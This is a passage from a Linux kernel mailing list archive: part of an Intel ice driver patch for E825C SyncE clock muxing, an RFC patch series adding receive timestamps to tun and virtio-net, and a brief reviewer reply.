ICE_DEV_ID_E825C_QSFP: + case ICE_DEV_ID_E825C_SFP: + case ICE_DEV_ID_E825C_SGMII: + *pin_num = ICE_SYNCE_CLK_NUM; + *base_idx = 0; + ret = 0; break; default: ret = -ENODEV; diff --git a/drivers/net/ethernet/intel/ice/ice_tspll.c b/drivers/net/ethernet/intel/ice/ice_tspll.c index 66320a4ab86fd..fd4b58eb9bc00 100644 --- a/drivers/net/ethernet/intel/ice/ice_tspll.c +++ b/drivers/net/ethernet/intel/ice/ice_tspll.c @@ -624,3 +624,220 @@ int ice_tspll_init(struct ice_hw *hw) return err; } + +/** + * ice_tspll_bypass_mux_active_e825c - check if the given port is set active + * @hw: Pointer to the HW struct + * @port: Number of the port + * @active: Output flag showing if port is active + * @output: Output pin, we have two in E825C + * + * Check if given port is selected as recovered clock source for given output. + * + * Return: + * * 0 - success + * * negative - error + */ +int ice_tspll_bypass_mux_active_e825c(struct ice_hw *hw, u8 port, bool *active, + enum ice_synce_clk output) +{ + u8 active_clk; + u32 val; + int err; + + switch (output) { + case ICE_SYNCE_CLK0: + err = ice_read_cgu_reg(hw, ICE_CGU_R10, &val); + if (err) + return err; + active_clk = FIELD_GET(ICE_CGU_R10_SYNCE_S_REF_CLK, val); + break; + case ICE_SYNCE_CLK1: + err = ice_read_cgu_reg(hw, ICE_CGU_R11, &val); + if (err) + return err; + active_clk = FIELD_GET(ICE_CGU_R11_SYNCE_S_BYP_CLK, val); + break; + default: + return -EINVAL; + } + + if (active_clk == port % hw->ptp.ports_per_phy + + ICE_CGU_BYPASS_MUX_OFFSET_E825C) + *active = true; + else + *active = false; + + return 0; +} + +/** + * ice_tspll_cfg_bypass_mux_e825c - configure reference clock mux + * @hw: Pointer to the HW struct + * @ena: true to enable the reference, false if disable + * @port_num: Number of the port + * @output: Output pin, we have two in E825C + * + * Set reference clock source and output clock selection. + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - success + * * negative - error + */ +int ice_tspll_cfg_bypass_mux_e825c(struct ice_hw *hw, bool ena, u32 port_num, + enum ice_synce_clk output) +{ + u8 first_mux; + int err; + u32 r10; + + err = ice_read_cgu_reg(hw, ICE_CGU_R10, &r10); + if (err) + return err; + + if (!ena) + first_mux = ICE_CGU_NET_REF_CLK0; + else + first_mux = port_num + ICE_CGU_BYPASS_MUX_OFFSET_E825C; + + r10 &= ~(ICE_CGU_R10_SYNCE_DCK_RST | ICE_CGU_R10_SYNCE_DCK2_RST); + + switch (output) { + case ICE_SYNCE_CLK0: + r10 &= ~(ICE_CGU_R10_SYNCE_ETHCLKO_SEL | + ICE_CGU_R10_SYNCE_ETHDIV_LOAD | + ICE_CGU_R10_SYNCE_S_REF_CLK); + r10 |= FIELD_PREP(ICE_CGU_R10_SYNCE_S_REF_CLK, first_mux); + r10 |= FIELD_PREP(ICE_CGU_R10_SYNCE_ETHCLKO_SEL, + ICE_CGU_REF_CLK_BYP0_DIV); + break; + case ICE_SYNCE_CLK1: + { + u32 val; + + err = ice_read_cgu_reg(hw, ICE_CGU_R11, &val); + if (err) + return err; + val &= ~ICE_CGU_R11_SYNCE_S_BYP_CLK; + val |= FIELD_PREP(ICE_CGU_R11_SYNCE_S_BYP_CLK, first_mux); + err = ice_write_cgu_reg(hw, ICE_CGU_R11, val); + if (err) + return err; + r10 &= ~(ICE_CGU_R10_SYNCE_CLKODIV_LOAD | + ICE_CGU_R10_SYNCE_CLKO_SEL); + r10 |= FIELD_PREP(ICE_CGU_R10_SYNCE_CLKO_SEL, + ICE_CGU_REF_CLK_BYP1_DIV); + break; + } + default: + return -EINVAL; + } + + err = ice_write_cgu_reg(hw, ICE_CGU_R10, r10); + if (err) + return err; + + return 0; +} + +/** + * ice_tspll_get_div_e825c - get the divider for the given speed + * @link_speed: link speed of the port + * @divider: output value, calculated divider + * + * Get CGU divider value based on the link speed. + * + * Return: + * * 0 - success + * * negative - error + */ +static int ice_tspll_get_div_e825c(u16 link_speed, unsigned int *divider) +{ + switch (link_speed) { + case ICE_AQ_LINK_SPEED_100GB: + case ICE_AQ_LINK_SPEED_50GB: + case ICE_AQ_LINK_SPEED_25GB: + *divider = 10; + break; + case ICE_AQ_LINK_SPEED_40GB: + case ICE_AQ_LINK_SPEED_10GB: + *divider = 4; + break; + case ICE_AQ_LINK_SPEED_5GB: + case ICE_AQ_LINK_SPEED_2500MB: + case ICE_AQ_LINK_SPEED_1000MB: + *divider = 2; + break; + case ICE_AQ_LINK_SPEED_100MB: + *divider = 1; + break; + default: + return -EOPNOTSUPP; + } + + return 0; +} + +/** + * ice_tspll_cfg_synce_ethdiv_e825c - set the divider on the mux + * @hw: Pointer to the HW struct + * @output: Output pin, we have two in E825C + * + * Set the correct CGU divider for RCLKA or RCLKB. + * + * Context: Called under pf->dplls.lock + * Return: + * * 0 - success + * * negative - error + */ +int ice_tspll_cfg_synce_ethdiv_e825c(struct ice_hw *hw, + enum ice_synce_clk output) +{ + unsigned int divider; + u16 link_speed; + u32 val; + int err; + + link_speed = hw->port_info->phy.link_info.link_speed; + if (!link_speed) + return 0; + + err = ice_tspll_get_div_e825c(link_speed, &divider); + if (err) + return err; + + err = ice_read_cgu_reg(hw, ICE_CGU_R10, &val); + if (err) + return err; + + /* programmable divider value (from 2 to 16) minus 1 for ETHCLKOUT */ + switch (output) { + case ICE_SYNCE_CLK0: + val &= ~(ICE_CGU_R10_SYNCE_ETHDIV_M1 | + ICE_CGU_R10_SYNCE_ETHDIV_LOAD); + val |= FIELD_PREP(ICE_CGU_R10_SYNCE_ETHDIV_M1, divider - 1); + err = ice_write_cgu_reg(hw, ICE_CGU_R10, val); + if (err) + return err; + val |= ICE_CGU_R10_SYNCE_ETHDIV_LOAD; + break; + case ICE_SYNCE_CLK1: + val &= ~(ICE_CGU_R10_SYNCE_CLKODIV_M1 | + ICE_CGU_R10_SYNCE_CLKODIV_LOAD); + val |= FIELD_PREP(ICE_CGU_R10_SYNCE_CLKODIV_M1, divider - 1); + err = ice_write_cgu_reg(hw, ICE_CGU_R10, val); + if (err) + return err; + val |= ICE_CGU_R10_SYNCE_CLKODIV_LOAD; + break; + default: + return -EINVAL; + } + + err = ice_write_cgu_reg(hw, ICE_CGU_R10, val); + if (err) + return err; + + return 0; +} diff --git a/drivers/net/ethernet/intel/ice/ice_tspll.h b/drivers/net/ethernet/intel/ice/ice_tspll.h index c0b1232cc07c3..d650867004d1f 100644 --- a/drivers/net/ethernet/intel/ice/ice_tspll.h +++ b/drivers/net/ethernet/intel/ice/ice_tspll.h @@ -21,11 +21,22 @@ struct ice_tspll_params_e82x { u32 frac_n_div; }; +#define ICE_CGU_NET_REF_CLK0 0x0 +#define ICE_CGU_REF_CLK_BYP0 0x5 +#define ICE_CGU_REF_CLK_BYP0_DIV 0x0 +#define ICE_CGU_REF_CLK_BYP1 0x4 +#define ICE_CGU_REF_CLK_BYP1_DIV 0x1 + #define ICE_TSPLL_CK_REFCLKFREQ_E825 0x1F #define ICE_TSPLL_NDIVRATIO_E825 5 #define ICE_TSPLL_FBDIV_INTGR_E825 256 int ice_tspll_cfg_pps_out_e825c(struct ice_hw *hw, bool enable); int ice_tspll_init(struct ice_hw *hw); - +int ice_tspll_bypass_mux_active_e825c(struct ice_hw *hw, u8 port, bool *active, + enum ice_synce_clk output); +int ice_tspll_cfg_bypass_mux_e825c(struct ice_hw *hw, bool ena, u32 port_num, + enum ice_synce_clk output); +int ice_tspll_cfg_synce_ethdiv_e825c(struct ice_hw *hw, + enum ice_synce_clk output); #endif /* _ICE_TSPLL_H_ */ diff --git a/drivers/net/ethernet/intel/ice/ice_type.h b/drivers/net/ethernet/intel/ice/ice_type.h index 6a2ec8389a8f3..1e82f4c40b326 100644 --- a/drivers/net/ethernet/intel/ice/ice_type.h +++ b/drivers/net/ethernet/intel/ice/ice_type.h @@ -349,6 +349,12 @@ enum ice_clk_src { NUM_ICE_CLK_SRC }; +enum ice_synce_clk { + ICE_SYNCE_CLK0, + ICE_SYNCE_CLK1, + ICE_SYNCE_CLK_NUM +}; + struct ice_ts_func_info { /* Function specific info */ enum ice_tspll_freq time_ref; -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:38 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
Demonstrate support for new virtio-net features VIRTIO_NET_HDR_F_TSTAMP This is not intended to be merged. A full feature test also requires a patched qemu binary that knows these features and negotiates correct vnet_hdr_sz in virtio_net_set_mrg_rx_bufs. See https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Not-yet-signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- drivers/net/tun.c | 30 ++++++++++++++++++------------ 1 file changed, 18 insertions(+), 12 deletions(-) diff --git a/drivers/net/tun.c b/drivers/net/tun.c index 8192740357a09..aa988a9c4bc99 100644 --- a/drivers/net/tun.c +++ b/drivers/net/tun.c @@ -2065,23 +2065,29 @@ static ssize_t tun_put_user(struct tun_struct *tun, } if (vnet_hdr_sz) { - struct virtio_net_hdr_v1_hash_tunnel hdr; - struct virtio_net_hdr *gso; + struct virtio_net_hdr_v1_hash_tunnel_ts hdr; + + memset(&hdr, 0, sizeof(hdr)); ret = tun_vnet_hdr_tnl_from_skb(tun->flags, tun->dev, skb, - &hdr); + (struct virtio_net_hdr_v1_hash_tunnel *)&hdr); if (ret) return ret; - /* - * Drop the packet if the configured header size is too small - * WRT the enabled offloads. - */ - gso = (struct virtio_net_hdr *)&hdr; - ret = __tun_vnet_hdr_put(vnet_hdr_sz, tun->dev->features, - iter, gso); - if (ret) - return ret; + if (vnet_hdr_sz >= sizeof(struct virtio_net_hdr_v1_hash_tunnel_ts)) { + __le64 tstamp = cpu_to_le64(ktime_get_ns()); + + hdr.tstamp_0 = (tstamp & 0x000000000000ffffULL) >> 0; + hdr.tstamp_1 = (tstamp & 0x00000000ffff0000ULL) >> 16; + hdr.tstamp_2 = (tstamp & 0x0000ffff00000000ULL) >> 32; + hdr.tstamp_3 = (tstamp & 0xffff000000000000ULL) >> 48; + } + + if (unlikely(iov_iter_count(iter) < vnet_hdr_sz)) + return -EINVAL; + + if (unlikely(copy_to_iter(&hdr, vnet_hdr_sz, iter) != vnet_hdr_sz)) + return -EFAULT; } if (vlan_hlen) { -- 2.52.0
{ "author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>", "date": "Thu, 29 Jan 2026 09:06:41 +0100", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
Add optional hardware rx timestamp offload for virtio-net. Introduce virtio feature VIRTIO_NET_F_TSTAMP. If negotiated, the virtio-net header is expanded with room for a timestamp. To get and set the hwtstamp the functions ndo_hwtstamp_set/get need to be implemented. This allows filtering the packets and only time stamp the packets where the filter matches. This way, the timestamping can be en/disabled at runtime. Tested: guest: ./timestamping eth0 \ SOF_TIMESTAMPING_RAW_HARDWARE \ SOF_TIMESTAMPING_RX_HARDWARE host: nc -4 -u 192.168.1.1 319 Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> -- Changes to last version: - rework series to use flow filters - add new struct virtio_net_hdr_v1_hash_tunnel_ts - original work done by: Willem de Bruijn <willemb@google.com> --- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 2 files changed, 133 insertions(+), 12 deletions(-) diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c index 1bb3aeca66c6e..4e8d9b20c1b34 100644 --- a/drivers/net/virtio_net.c +++ b/drivers/net/virtio_net.c @@ -429,6 +429,9 @@ struct virtnet_info { struct virtio_net_rss_config_trailer rss_trailer; u8 rss_hash_key_data[VIRTIO_NET_RSS_MAX_KEY_SIZE]; + /* Device passes time stamps from the driver */ + bool has_tstamp; + /* Has control virtqueue */ bool has_cvq; @@ -475,6 +478,8 @@ struct virtnet_info { struct control_buf *ctrl; + struct kernel_hwtstamp_config tstamp_config; + /* Ethtool settings */ u8 duplex; u32 speed; @@ -511,6 +516,7 @@ struct virtio_net_common_hdr { struct virtio_net_hdr_mrg_rxbuf mrg_hdr; struct virtio_net_hdr_v1_hash hash_v1_hdr; struct virtio_net_hdr_v1_hash_tunnel tnl_hdr; + struct virtio_net_hdr_v1_hash_tunnel_ts ts_hdr; }; }; @@ -682,6 +688,13 @@ skb_vnet_common_hdr(struct sk_buff *skb) return (struct virtio_net_common_hdr *)skb->cb; } +static inline struct virtio_net_hdr_v1_hash_tunnel_ts *skb_vnet_hdr_ts(struct sk_buff *skb) +{ + BUILD_BUG_ON(sizeof(struct virtio_net_hdr_v1_hash_tunnel_ts) > sizeof(skb->cb)); + + return (void *)skb->cb; +} + /* * private is used to chain pages for big packets, put the whole * most recent used list in the beginning for reuse @@ -2560,6 +2573,15 @@ virtio_net_hash_value(const struct virtio_net_hdr_v1_hash *hdr_hash) (__le16_to_cpu(hdr_hash->hash_value_hi) << 16); } +static inline u64 +virtio_net_tstamp_value(const struct virtio_net_hdr_v1_hash_tunnel_ts *hdr_hash_ts) +{ + return (u64)__le16_to_cpu(hdr_hash_ts->tstamp_0) | + ((u64)__le16_to_cpu(hdr_hash_ts->tstamp_1) << 16) | + ((u64)__le16_to_cpu(hdr_hash_ts->tstamp_2) << 32) | + ((u64)__le16_to_cpu(hdr_hash_ts->tstamp_3) << 48); +} + static void virtio_skb_set_hash(const struct virtio_net_hdr_v1_hash *hdr_hash, struct sk_buff *skb) { @@ -2589,6 +2611,18 @@ static void virtio_skb_set_hash(const struct virtio_net_hdr_v1_hash *hdr_hash, skb_set_hash(skb, virtio_net_hash_value(hdr_hash), rss_hash_type); } +static inline void virtnet_record_rx_tstamp(const struct virtnet_info *vi, + struct sk_buff *skb) +{ + struct skb_shared_hwtstamps *shhwtstamps = skb_hwtstamps(skb); + const struct virtio_net_hdr_v1_hash_tunnel_ts *h = skb_vnet_hdr_ts(skb); + u64 ts; + + ts = virtio_net_tstamp_value(h); + memset(shhwtstamps, 0, sizeof(struct skb_shared_hwtstamps)); + shhwtstamps->hwtstamp = ns_to_ktime(ts); +} + static void virtnet_receive_done(struct virtnet_info *vi, struct receive_queue *rq, struct sk_buff *skb, u8 flags) { @@ -2617,6 +2651,8 @@ static void virtnet_receive_done(struct virtnet_info *vi, struct receive_queue * goto frame_err; } + if (vi->has_tstamp && vi->tstamp_config.rx_filter != HWTSTAMP_FILTER_NONE) + virtnet_record_rx_tstamp(vi, skb); skb_record_rx_queue(skb, vq2rxq(rq->vq)); skb->protocol = eth_type_trans(skb, dev); pr_debug("Receiving skb proto 0x%04x len %i type %i\n", @@ -3321,7 +3357,7 @@ static int xmit_skb(struct send_queue *sq, struct sk_buff *skb, bool orphan) { const unsigned char *dest = ((struct ethhdr *)skb->data)->h_dest; struct virtnet_info *vi = sq->vq->vdev->priv; - struct virtio_net_hdr_v1_hash_tunnel *hdr; + struct virtio_net_hdr_v1_hash_tunnel_ts *hdr; int num_sg; unsigned hdr_len = vi->hdr_len; bool can_push; @@ -3329,8 +3365,8 @@ static int xmit_skb(struct send_queue *sq, struct sk_buff *skb, bool orphan) pr_debug("%s: xmit %p %pM\n", vi->dev->name, skb, dest); /* Make sure it's safe to cast between formats */ - BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->hash_hdr)); - BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->hash_hdr.hdr)); + BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->tnl.hash_hdr)); + BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->tnl.hash_hdr.hdr)); can_push = vi->any_header_sg && !((unsigned long)skb->data & (__alignof__(*hdr) - 1)) && @@ -3338,18 +3374,18 @@ static int xmit_skb(struct send_queue *sq, struct sk_buff *skb, bool orphan) /* Even if we can, don't push here yet as this would skew * csum_start offset below. */ if (can_push) - hdr = (struct virtio_net_hdr_v1_hash_tunnel *)(skb->data - - hdr_len); + hdr = (struct virtio_net_hdr_v1_hash_tunnel_ts *)(skb->data - + hdr_len); else - hdr = &skb_vnet_common_hdr(skb)->tnl_hdr; + hdr = &skb_vnet_common_hdr(skb)->ts_hdr; - if (virtio_net_hdr_tnl_from_skb(skb, hdr, vi->tx_tnl, + if (virtio_net_hdr_tnl_from_skb(skb, &hdr->tnl, vi->tx_tnl, virtio_is_little_endian(vi->vdev), 0, false)) return -EPROTO; if (vi->mergeable_rx_bufs) - hdr->hash_hdr.hdr.num_buffers = 0; + hdr->tnl.hash_hdr.hdr.num_buffers = 0; sg_init_table(sq->sg, skb_shinfo(skb)->nr_frags + (can_push ? 1 : 2)); if (can_push) { @@ -5563,6 +5599,22 @@ static int virtnet_get_per_queue_coalesce(struct net_device *dev, return 0; } +static int virtnet_get_ts_info(struct net_device *dev, + struct kernel_ethtool_ts_info *info) +{ + /* setup default software timestamp */ + ethtool_op_get_ts_info(dev, info); + + info->rx_filters = (BIT(HWTSTAMP_FILTER_NONE) | + BIT(HWTSTAMP_FILTER_PTP_V1_L4_SYNC) | + BIT(HWTSTAMP_FILTER_PTP_V1_L4_DELAY_REQ) | + BIT(HWTSTAMP_FILTER_ALL)); + + info->tx_types = HWTSTAMP_TX_OFF; + + return 0; +} + static void virtnet_init_settings(struct net_device *dev) { struct virtnet_info *vi = netdev_priv(dev); @@ -5658,7 +5710,7 @@ static const struct ethtool_ops virtnet_ethtool_ops = { .get_ethtool_stats = virtnet_get_ethtool_stats, .set_channels = virtnet_set_channels, .get_channels = virtnet_get_channels, - .get_ts_info = ethtool_op_get_ts_info, + .get_ts_info = virtnet_get_ts_info, .get_link_ksettings = virtnet_get_link_ksettings, .set_link_ksettings = virtnet_set_link_ksettings, .set_coalesce = virtnet_set_coalesce, @@ -6242,6 +6294,58 @@ static void virtnet_tx_timeout(struct net_device *dev, unsigned int txqueue) jiffies_to_usecs(jiffies - READ_ONCE(txq->trans_start))); } +static int virtnet_hwtstamp_get(struct net_device *dev, + struct kernel_hwtstamp_config *tstamp_config) +{ + struct virtnet_info *vi = netdev_priv(dev); + + if (!netif_running(dev)) + return -EINVAL; + + *tstamp_config = vi->tstamp_config; + + return 0; +} + +static int virtnet_hwtstamp_set(struct net_device *dev, + struct kernel_hwtstamp_config *tstamp_config, + struct netlink_ext_ack *extack) +{ + struct virtnet_info *vi = netdev_priv(dev); + + if (!netif_running(dev)) + return -EINVAL; + + switch (tstamp_config->rx_filter) { + case HWTSTAMP_FILTER_PTP_V1_L4_SYNC: + case HWTSTAMP_FILTER_PTP_V1_L4_DELAY_REQ: + break; + case HWTSTAMP_FILTER_PTP_V2_EVENT: + case HWTSTAMP_FILTER_PTP_V2_L2_EVENT: + case HWTSTAMP_FILTER_PTP_V2_L4_EVENT: + case HWTSTAMP_FILTER_PTP_V2_SYNC: + case HWTSTAMP_FILTER_PTP_V2_L2_SYNC: + case HWTSTAMP_FILTER_PTP_V2_L4_SYNC: + case HWTSTAMP_FILTER_PTP_V2_DELAY_REQ: + case HWTSTAMP_FILTER_PTP_V2_L2_DELAY_REQ: + case HWTSTAMP_FILTER_PTP_V2_L4_DELAY_REQ: + tstamp_config->rx_filter = HWTSTAMP_FILTER_PTP_V2_EVENT; + break; + case HWTSTAMP_FILTER_NONE: + break; + case HWTSTAMP_FILTER_ALL: + tstamp_config->rx_filter = HWTSTAMP_FILTER_ALL; + break; + default: + tstamp_config->rx_filter = HWTSTAMP_FILTER_ALL; + return -ERANGE; + } + + vi->tstamp_config = *tstamp_config; + + return 0; +} + static int virtnet_init_irq_moder(struct virtnet_info *vi) { u8 profile_flags = 0, coal_flags = 0; @@ -6289,6 +6393,8 @@ static const struct net_device_ops virtnet_netdev = { .ndo_get_phys_port_name = virtnet_get_phys_port_name, .ndo_set_features = virtnet_set_features, .ndo_tx_timeout = virtnet_tx_timeout, + .ndo_hwtstamp_set = virtnet_hwtstamp_set, + .ndo_hwtstamp_get = virtnet_hwtstamp_get, }; static void virtnet_config_changed_work(struct work_struct *work) @@ -6911,6 +7017,9 @@ static int virtnet_probe(struct virtio_device *vdev) if (virtio_has_feature(vdev, VIRTIO_NET_F_HASH_REPORT)) vi->has_rss_hash_report = true; + if (virtio_has_feature(vdev, VIRTIO_NET_F_TSTAMP)) + vi->has_tstamp = true; + if (virtio_has_feature(vdev, VIRTIO_NET_F_RSS)) { vi->has_rss = true; @@ -6945,8 +7054,10 @@ static int virtnet_probe(struct virtio_device *vdev) dev->xdp_metadata_ops = &virtnet_xdp_metadata_ops; } - if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_UDP_TUNNEL_GSO) || - virtio_has_feature(vdev, VIRTIO_NET_F_HOST_UDP_TUNNEL_GSO)) + if (vi->has_tstamp) + vi->hdr_len = sizeof(struct virtio_net_hdr_v1_hash_tunnel_ts); + else if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_UDP_TUNNEL_GSO) || + virtio_has_feature(vdev, VIRTIO_NET_F_HOST_UDP_TUNNEL_GSO)) vi->hdr_len = sizeof(struct virtio_net_hdr_v1_hash_tunnel); else if (vi->has_rss_hash_report) vi->hdr_len = sizeof(struct virtio_net_hdr_v1_hash); @@ -7269,7 +7380,8 @@ static struct virtio_device_id id_table[] = { VIRTIO_NET_F_SPEED_DUPLEX, VIRTIO_NET_F_STANDBY, \ VIRTIO_NET_F_RSS, VIRTIO_NET_F_HASH_REPORT, VIRTIO_NET_F_NOTF_COAL, \ VIRTIO_NET_F_VQ_NOTF_COAL, \ - VIRTIO_NET_F_GUEST_HDRLEN, VIRTIO_NET_F_DEVICE_STATS + VIRTIO_NET_F_GUEST_HDRLEN, VIRTIO_NET_F_DEVICE_STATS, \ + VIRTIO_NET_F_TSTAMP static unsigned int features[] = { VIRTNET_FEATURES, diff --git a/include/uapi/linux/virtio_net.h b/include/uapi/linux/virtio_net.h index 1db45b01532b5..9f967575956b8 100644 --- a/include/uapi/linux/virtio_net.h +++ b/include/uapi/linux/virtio_net.h @@ -56,6 +56,7 @@ #define VIRTIO_NET_F_MQ 22 /* Device supports Receive Flow * Steering */ #define VIRTIO_NET_F_CTRL_MAC_ADDR 23 /* Set MAC address */ +#define VIRTIO_NET_F_TSTAMP 49 /* Device sends TAI receive time */ #define VIRTIO_NET_F_DEVICE_STATS 50 /* Device can provide device-level statistics. */ #define VIRTIO_NET_F_VQ_NOTF_COAL 52 /* Device supports virtqueue notification coalescing */ #define VIRTIO_NET_F_NOTF_COAL 53 /* Device supports notifications coalescing */ @@ -215,6 +216,14 @@ struct virtio_net_hdr_v1_hash_tunnel { __le16 inner_nh_offset; }; +struct virtio_net_hdr_v1_hash_tunnel_ts { + struct virtio_net_hdr_v1_hash_tunnel tnl; + __le16 tstamp_0; + __le16 tstamp_1; + __le16 tstamp_2; + __le16 tstamp_3; +}; + #ifndef VIRTIO_NET_NO_LEGACY /* This header comes first in the scatter-gather list. * For legacy virtio, if VIRTIO_F_ANY_LAYOUT is not negotiated, it must -- 2.52.0
{ "author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>", "date": "Thu, 29 Jan 2026 09:06:42 +0100", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
On Thu, 29 Jan 2026 09:06:42 +0100, Steffen Trumtrar <s.trumtrar@pengutronix.de> wrote: Since patch #1 used this struct, this one should be placed first in the series. Also, has the virtio specification process accepted such a draft proposal? Thanks
{ "author": "Xuan Zhuo <xuanzhuo@linux.alibaba.com>", "date": "Thu, 29 Jan 2026 17:48:25 +0800", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: 